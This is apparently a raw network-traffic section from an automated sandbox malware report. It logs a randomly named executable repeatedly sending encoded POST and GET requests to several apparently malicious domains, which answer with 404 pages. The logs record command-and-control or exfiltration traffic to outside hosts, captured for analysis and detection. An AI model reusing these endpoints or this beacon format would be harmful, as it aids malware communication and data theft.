                                                          Server: cloudflare
                                                          CF-RAY: 902cb6980c7faadf-YYZ
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=14118&min_rtt=14118&rtt_var=7059&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1777&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549983172.67.182.198803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:11.242889881 CET484OUTGET /kxtt/?R4Stj2k=eC1oD4IhFSd/6jtL1AhIhKazMaYu9E65zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXj2cOA9AsjjYxFgIbzI/ZykrVUFshkofZlIAuVzcX4MBGxA==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:11.930166006 CET1114INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:11 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B316oEP6nehNekEPmV%2BueJXQ7ST3BIWGP1zZddQCxxnZC%2BQF4Tb%2B9Q3Xw8GVS2DbsDLhyt5Dh6yTSFKbjLkuh6hws%2FhQ7GY09otUCyw3k1va%2F3i%2BcrKjXi9m1XMkL1zFjxhg"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 902cb6a7db15ab5a-YYZ
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13632&min_rtt=13632&rtt_var=6816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 31 31 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 115<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>10


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.549984134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:17.210191965 CET737OUTPOST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 68 70 70 78 36 37 6c 37 6a 35 66 67 30 63 62 6f 45 6f 4e 4e 6a 62 77 67 67 56 4f 4f 49 69 78 41 49 32 34 5a 34 51 62 4b 68 77 67 45 56 6d 50 44 7a 4a 4d 63 38 65 37 2f 46 6e 58 4b 4d 30 70 35 4c 45 70 68 36 36 51 70 76 75 75 61 69 62 75 61 46 56 70 56 48 72 76 52 47 45 57 42 62 31 78 6e 64 52 58 64 6a 64 45 78 67 4e 70 6d 74 6f 39 4b 2b 63 41 73 42 47 50 47 47 5a 6f 31 47 71 50 4f 4b 4c 56 68 39 62 35 55 45 61 56 5a 4a 6b 4f 4e 73 33 56 70 77 41 7a 7a 4d 55 32 49 49 5a 41 69 53 35 6d 2f 4e 72 69 32 6f 58 6e 2b 57 35 66 33 46 53 58 47 38 75 6a 34 68 67 3d
                                                          Data Ascii: R4Stj2k=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpwAzzMU2IIZAiS5m/Nri2oXn+W5f3FSXG8uj4hg=
                                                          Jan 16, 2025 09:25:18.072521925 CET312INHTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:17 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.549985134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:19.759061098 CET757OUTPOST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 37 57 78 44 6f 47 34 59 35 51 62 5a 52 77 67 4d 31 6d 47 65 6a 4a 54 63 38 53 56 2f 45 62 58 4b 4d 67 70 35 4c 30 70 68 4a 43 54 70 2f 75 67 42 79 62 6f 51 6c 56 70 56 48 72 76 52 48 68 37 42 59 46 78 6e 4a 56 58 63 42 35 48 79 67 4d 62 75 4e 6f 39 63 4f 63 63 73 42 47 68 47 48 31 47 31 46 53 50 4f 4c 37 56 68 76 7a 36 64 45 61 58 55 70 6c 4a 46 4d 75 4a 68 6d 51 2f 7a 71 6c 66 58 37 56 64 6e 6b 49 4d 6c 76 6a 4b 6c 49 37 66 75 46 78 6f 6d 31 7a 2b 63 66 2b 54 6d 32 32 33 63 46 35 50 53 52 48 67 4b 33 4c 55 6d 4f 6b 36 31 78 31 6d
                                                          Data Ascii: R4Stj2k=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlI7fuFxom1z+cf+Tm223cF5PSRHgK3LUmOk61x1m
                                                          Jan 16, 2025 09:25:20.608370066 CET312INHTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:20 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.549986134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:22.321666956 CET1774OUTPOST /a59t/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.44756.pizza
                                                          Origin: http://www.44756.pizza
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1244
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.44756.pizza/a59t/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 64 64 6c 52 52 55 78 37 7a 67 36 35 54 74 6f 31 67 4d 30 6a 48 51 58 38 32 38 6d 58 36 53 65 55 68 55 5a 55 37 2b 43 7a 33 52 77 4a 35 74 34 55 38 41 6a 51 55 50 4e 73 66 33 73 4f 4b 4c 44 35 6f 6d 73 42 35 56 67 38 30 35 6e 65 61 52 61 4d 37 77 6e 55 56 32 33 56 35 41 2f 69 4c 37 70 46 44 74 4b 38 53 6e 49 73 63 42 71 45 50 65 4d 4a 75 43 68 46 6a 30 57 38 33 56 5a 71 45 2b 59 65 45 4d 37 4e 6b 76 75 6a 38 73 66 46 78 36 39 66 47 34 5a 6c 67 55 4b 52 6e 42 41 72 68 2b 5a 32 [TRUNCATED]
                                                          Data Ascii: R4Stj2k=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7ddlRRUx7zg65Tto1gM0jHQX828mX6SeUhUZU7+Cz3RwJ5t4U8AjQUPNsf3sOKLD5omsB5Vg805neaRaM7wnUV23V5A/iL7pFDtK8SnIscBqEPeMJuChFj0W83VZqE+YeEM7Nkvuj8sfFx69fG4ZlgUKRnBArh+Z2ijfhUh1uJJrHOAamu6egmErHHBPzHMNRIp20OEHcsqVPMLsXTasd0oaU+0uyGXmk7PUI1Qpg+D9upL0Ir8PlJlj7aVjXEw2KwOsh3g/JVIDbo4eeWFR2ho2Vh7E5j6r8DLfuSdhd/xCJpvjy5zJaqp72OWT7fXiJp4XEx2kx7csZ2cjZphbqsYe7YfLY4sMQ0L3Ec7oJxqMMg7tAF8TJkb7QGVrbly4lc8MBA3+5z7D7Joz3JiImW0xk7aAycdRyZY6wnHN8S3RkNg49aw2Wy4+CxKef5k56v5UU6escqoOotgXo1PgcS0Yi2RLWeE4IJd2sY1uV82LzX33kD1Zk30prsxMeJsX2Rm4Z/bK27j8r6sZw9XIAjAGgr4VaKkJC98pxVdm7OYRRKt5VLvf9eGKZVFxNznZWqcNzfLEplbrJSGA8ycV74F46KfYdrqY69ceYnYQH+HATfqw8OMJANjlv66S/+UdFLZNOLzn67c0qYZhIu/88IaNu8hC3fBOh3LBl4KOZPx3W/H2LX+ilbSLoZ2RZUipX8LKUuHsNZLwP6d5FNrePQm8abfSCht3Xiz2HJxYYg31tHSXXLGZV/cDfJF61Umdiy90TGaHh498p/9jFQ5HUQKBCeCTeGSPUbUJtdNy4shrNfmoluknniwUp2EJJPEofBU [TRUNCATED]
                                                          Jan 16, 2025 09:25:23.165278912 CET312INHTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:23 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.549987134.122.133.80803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:24.866805077 CET483OUTGET /a59t/?R4Stj2k=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acsoaYUTukUw5/VlLJHlB4H68wgcF/MAlZiH8mu7MSOf5Syg==&ml=PF-8nXUHD HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.44756.pizza
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Jan 16, 2025 09:25:25.734050035 CET312INHTTP/1.1 404 Not Found
                                                          Content-Length: 148
                                                          Content-Type: text/html
                                                          Date: Thu, 16 Jan 2025 08:25:25 GMT
                                                          Etag: "6743f11f-94"
                                                          Server: nginx
                                                          Connection: close
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.549988199.192.21.169803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:30.787894964 CET746OUTPOST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 208
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 59 43 78 53 48 36 39 4a 7a 5a 66 61 66 7a 75 31 54 2f 4c 6e 37 48 66 32 6b 52 58 54 51 37 36 59 6c 35 32 55 5a 34 3d
                                                          Data Ascii: R4Stj2k=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOYCxSH69JzZfafzu1T/Ln7Hf2kRXTQ76Yl52UZ4=
                                                          Jan 16, 2025 09:25:31.377538919 CET918INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:31 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.549989199.192.21.169803304C:\Program Files (x86)\NDWZDtcCSOerkwHUATuByXALRMlNVDulItdVeOTqISSebXFaozDVKcOPCDiHaLmBnUBBzoTyUCsnwnX\DlLArodfwUXcDj.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 16, 2025 09:25:33.346983910 CET766OUTPOST /bowc/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate
                                                          Host: www.lonfor.website
                                                          Origin: http://www.lonfor.website
                                                          Cache-Control: max-age=0
                                                          Content-Length: 228
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.lonfor.website/bowc/
                                                          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                          Data Raw: 52 34 53 74 6a 32 6b 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 72 6e 6d 33 5a 67 43 67 61 54 43 47 70 47 4b 4f 73 45 37 33 76 76 41 66 6b 77 66 35 79 70 53 41 4a 2b 59 50 68 51
                                                          Data Ascii: R4Stj2k=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0brnm3ZgCgaTCGpGKOsE73vvAfkwf5ypSAJ+YPhQ
                                                          Jan 16, 2025 09:25:33.932046890 CET918INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 08:25:33 GMT
                                                          Server: Apache
                                                          Content-Length: 774
                                                          Connection: close
                                                          Content-Type: text/html
